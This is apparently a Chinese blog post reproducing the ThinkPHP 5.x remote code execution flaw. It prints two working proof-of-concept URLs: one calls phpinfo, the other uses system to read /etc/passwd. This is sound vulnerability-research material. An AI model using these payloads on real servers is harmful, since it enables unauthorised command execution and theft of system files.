Thinkphp5 5.0.22 / 5.1.29远程执行代码漏洞复现
Thinkphp5 5.0.22 / 5.1.29远程执行代码漏洞复现
渗透攻击红队
发布于 2019-11-20 12:00:07
发布于 2019-11-20 12:00:07
文章被收录于专栏:漏洞知识库
网络安全/渗透测试/代码审计/
关注
ThinkPhp5.x远程代码执行漏洞复现
漏洞简介
2018年12月10日中午,thinkphp官方公众号发布了一个更新通知,包含了一个5.x系列所有版本存在被getshell的高风险漏洞。
漏洞原理
结合官方公告说的由于对控制器名没有足够的检测,再查看官方git commit信息
复现过程
通过phpinfo函数写出phpinfo()的信息
POC:
通过phpinfo函数写出phpinfo()的信息
index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
利用system函数远程命令执行
POC:
利用system函数远程命令执行读取/etc/passwd
index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20/etc/passwd本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2019-10-26,如有侵权请联系 cloudcommunity@tencent.com 删除
评论
登录后参与评论
推荐阅读
腾讯云开发者
